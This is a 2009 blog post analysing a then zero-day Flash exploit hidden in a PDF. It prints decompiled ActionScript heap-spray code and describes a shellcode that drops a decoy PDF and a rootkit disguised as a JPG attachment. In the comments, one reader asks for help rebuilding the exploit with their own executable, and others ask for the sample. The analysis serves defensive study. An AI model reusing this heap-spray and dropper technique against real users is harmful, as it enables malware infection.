Friday, August 14, 2009

SWF Exploit Embedded in PDF

Hi readers

Recently I have received a sample of recent 0-day SWF exploit embedded in PDF. I have analyzed this exploit and found some interesting points.

This PDF file have 2 embedded SWF files, one of them simply sprays the Adobe process heap and the other one triggers the bug in AVM2 (Action Script Virtual Machine).

First I want to explain a little about heap sprayer SWF file. Here is decompiled code from heap_spray.swf:

package
{
import flash.display.*;
import flash.utils.*;

dynamic public class MainTimeline extends MovieClip
{
public var byteArr:ByteArray;
public var b:Object;
public var a:Object;

public function MainTimeline()
{
addFrameScript(0, frame1);
return;
}// end function

function frame1()
{
b = "\f\f\f\f";
a = "\x13\x13\x13\x13";
while (b.length < 1048576)
{

b = b + a;
}
byteArr = new ByteArray();
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
while (byteArr.length < 1048576 * 64)
{

byteArr.writeMultiByte(b, "iso-8859-1");
}
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(144);
...........



I'll try to explain step-by-step what this ActionScript trying to do:

1) Creates a variable with 4 bytes of a char which have ascii code 19.
2) Creates a byte array and appends 4 bytes of ascii code 19 charachter until byte array size exceeds 0x100000 bytes.
3) It appends 6 bytes of NOP sled to byte array.
4) Then tries to append original shellcode which:
a) Calls GetCommandLineA to get path of PDF file.
b) Opens/Reads PDF file's attachment. The attachment is called "love_wallpaper_butterfly-dsc08951.jpg", but infact it's not a JPEG image file, it's crypted 2 exe files, TEMP.EXE and SUCHOST.EXE
c) Shellcode reads both exe files, decrypt them and put them in Current User's %TEMP% folder.
d) One of exe files have a PDF file embedded and opens a working normal PDF file with some text. Other file is the malware which is detected by most of AVs on VT (virustotal).


Here is screenshot of attachment in PDF:





TEMP.EXE is the file which have PDF embedded and tries to trick user and unexperienced users will think Acrobat just restarted and original PDF file opened.
SUCHOST.EXE is the malware which installs Sysmon.sys and makes it hidden. Simply you can disinfect your PC from this malware by using GMER.

I'll publish more details about other SWF exploit file which triggers bug in AVM2 (ActionScript Virtual Machine).


It's obvious that embedding flash in PDF files feature will have more bugs in near future.

I should mention that this bug was already reported to Adobe as a crash bug, but it seems online some smart chineese people determined it's importance.

I'll publish next article in next few days about this bug.

If you have any question related to this exploit, don't hesitate to ask me.

Kind Regards

5 comments:

  1. Hi I got a sample of this exploit mentioned here... It's undectable by all anti virus softwares. And also the exe(crypted as jpg) is hidden..... I was trying to regenerate the exploit.... But I could not find a method to emdedd my test exe as jpg. I tried to change the header of exe with jpg. But it don't worked... Can you help???

    ReplyDelete
  2. Hi,

    great article. I have one question though: How did you extract the shellcode? How did you convert the writeBytes sequence into shellcode and how did you then get the jpg/exe file? Maybe you can drop me an email to sebastian AT wolfgarten.com to discuss this further?

    Thanks a lot.

    Kind regards,
    Sebastian

    ReplyDelete
  3. Hi again,

    forget about my previous question. I simply wrote a quick Java program to do the job. Thanks anyway.

    Kind regards,
    Sebastian

    ReplyDelete
  4. Can I have link to sample exploit,I am also interested in analysis!
    Thx

    ReplyDelete
  5. thanks, it's nice article. i need the sample for this exploit. i try to searchit but i m not able to get that one.

    Thanks

    ReplyDelete